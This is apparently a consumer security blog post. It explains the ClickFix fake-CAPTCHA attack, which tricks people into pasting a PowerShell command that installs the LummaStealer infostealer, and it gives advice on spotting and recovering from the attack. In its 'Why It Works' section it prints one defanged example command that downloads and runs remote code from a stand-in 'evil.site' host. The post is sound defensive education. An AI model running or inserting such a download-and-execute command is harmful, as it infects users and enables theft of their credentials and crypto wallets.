ANDRI.BLOG
Security
6 min read

The Fake CAPTCHA That Wants You to Run a Command

A sneaky social engineering attack is tricking people into infecting their own computers. Here's how ClickFix works and how to spot it.

There's a nasty trick circulating that flips the usual malware delivery on its head. Instead of exploiting a vulnerability or tricking you into downloading a file, attackers are convincing people to infect themselves — by copying and pasting commands they don't understand.

It's called ClickFix, and according to new research from Bitdefender, it's driving a surge in LummaStealer infections across Europe and beyond.

Here's how it works, and how to make sure you never fall for it.

The Setup

You're browsing normally. Maybe you clicked an ad, followed a link from social media, or landed on a compromised website. Suddenly you see what looks like a verification prompt:

"Verify you are human"

Or sometimes:

"Your browser needs to verify this action"

Below it are step-by-step instructions. They look official. Professional, even. The page might have Google branding, a Cloudflare logo, or some other trusted company's styling.

The instructions tell you to:

  1. Press Win + R (opens the Windows Run dialog)
  2. Press Ctrl + V (paste from clipboard)
  3. Press Enter (execute the command)

What you don't realize is that visiting the page already copied a malicious command to your clipboard. By following the "verification" steps, you're running that command yourself.

What's Actually Happening

That command you just pasted? It's usually PowerShell code that:

  1. Downloads a script from an attacker-controlled server
  2. Runs it directly in memory (so antivirus might not catch it)
  3. Installs malware — typically an infostealer like LummaStealer

The whole infection chain relies on you doing the work. You opened the Run dialog. You pasted the command. You hit Enter. From the computer's perspective, you did this intentionally.

This is what makes ClickFix so clever (and so dangerous). Traditional security warnings are designed to stop programs from doing dangerous things without your permission. But you just gave permission. Explicitly.

Why It Works

The attack exploits a few things about how we use computers:

We're trained to complete CAPTCHAs. After years of "click all the traffic lights" and "prove you're not a robot," verification prompts feel routine. We don't question them.

The steps look simple and harmless. Press this, paste that, done. There's nothing obviously scary about it. No download button, no .exe file, no warning dialog.

Most people don't know what PowerShell is. If you've never used it, a command like powershell -w h -c "IEX(irm hxxps://evil.site/x)" is meaningless gibberish. You have no way to evaluate whether it's dangerous.

It bypasses security tools. Because you're running the command manually, there's no suspicious email attachment, no dodgy download, no browser warning to trigger.

What the Malware Does

The current wave of ClickFix attacks is dropping LummaStealer, an infostealer that was disrupted by law enforcement in 2025 but has since rebuilt itself.

Once running, LummaStealer targets:

  • Saved passwords in Chrome, Firefox, Edge, and other browsers
  • Session cookies that let attackers log into your accounts without needing your password
  • Cryptocurrency wallets (Metamask, Phantom, and others)
  • Two-factor authentication apps if you use browser-based ones
  • VPN configurations and credentials
  • Documents that might contain sensitive information

Everything gets packaged up and sent to the attackers. Your accounts, your crypto, your identity — all compromised because you followed three simple steps on what looked like a routine verification page.

How to Spot It

The good news: these attacks are easy to avoid once you know what to look for.

No Legitimate Site Asks You to Run Commands

This is the golden rule. No real CAPTCHA, no real verification system, no real browser check will ever ask you to:

  • Open the Run dialog (Win + R)
  • Open PowerShell or Command Prompt
  • Paste anything into a terminal
  • Run any command

If a website asks you to do any of this, it's a scam. Full stop. Close the tab immediately.

Check Your Clipboard

If you're suspicious, before doing anything else, open Notepad and press Ctrl + V. See what's in your clipboard. If it's a command you didn't copy — especially one with "powershell," "cmd," "IEX," "irm," or a URL you don't recognize — that page was trying to infect you.

Delete the clipboard contents (copy something harmless like a space character) and close the browser tab.

Look for Pressure Tactics

These pages often create urgency:

  • "Your session will expire"
  • "Complete verification to continue"
  • "Security check required"
  • Timer counting down

Real verification systems don't threaten you. If a page is pushing you to act fast, that's a red flag.

The Page Appeared Out of Nowhere

ClickFix pages typically appear through:

  • Malicious ads (malvertising)
  • Compromised websites
  • Phishing links in emails or messages
  • Search engine results for pirated content

If you weren't doing anything that would normally require verification, why would you suddenly need to verify yourself?

What to Do If You Fell For It

If you already ran the command:

Immediately

  1. Disconnect from the internet — WiFi off, cable unplugged. This might prevent data from being sent to the attackers.

  2. Don't log into anything else — Any credentials you enter now might get captured.

Within the Next Hour

  1. Run a full malware scan — Use Malwarebytes (free version is fine) in addition to Windows Defender. Infostealers are often detected better by secondary scanners.

  2. Check Task Manager — Look for unfamiliar processes using CPU or network. LummaStealer infections often show as random-named executables.

  3. Check startup programs — Settings → Apps → Startup. Disable anything you don't recognize.

After You've Cleaned Up

  1. Change your passwords — Every account. Start with email, banking, and anything financial. Use a different device if possible.

  2. Check for unauthorized access — Log into your important accounts and check recent activity. Look for logins from unfamiliar locations or devices.

  3. Enable 2FA everywhere — If you haven't already. Use an authenticator app, not SMS.

  4. Check your cryptocurrency — If you have any. Wallet drainers act fast.

  5. Monitor your accounts — Watch for suspicious activity over the next few weeks. Consider a credit freeze if you're in a country where that's available.

The Takeaway

ClickFix has been around since 2024, but it's surging now. Multiple criminal groups are using it, and the wrappers keep evolving — fake browser updates, fake error messages, fake CAPTCHAs.

But the defense stays the same: legitimate websites never ask you to run commands.

Tattoo it on your brain. Tell your family. The moment any website asks you to open PowerShell or the Run dialog, you're looking at an attack. Close the tab. Done.

Sources: Bitdefender, BleepingComputer

▸ TAGS
#security#social-engineering#malware#phishing#PowerShell
▸ STAY IN THE LOOP

Weekly. No spam. No fluff.

← BACK TO ALL ARTICLES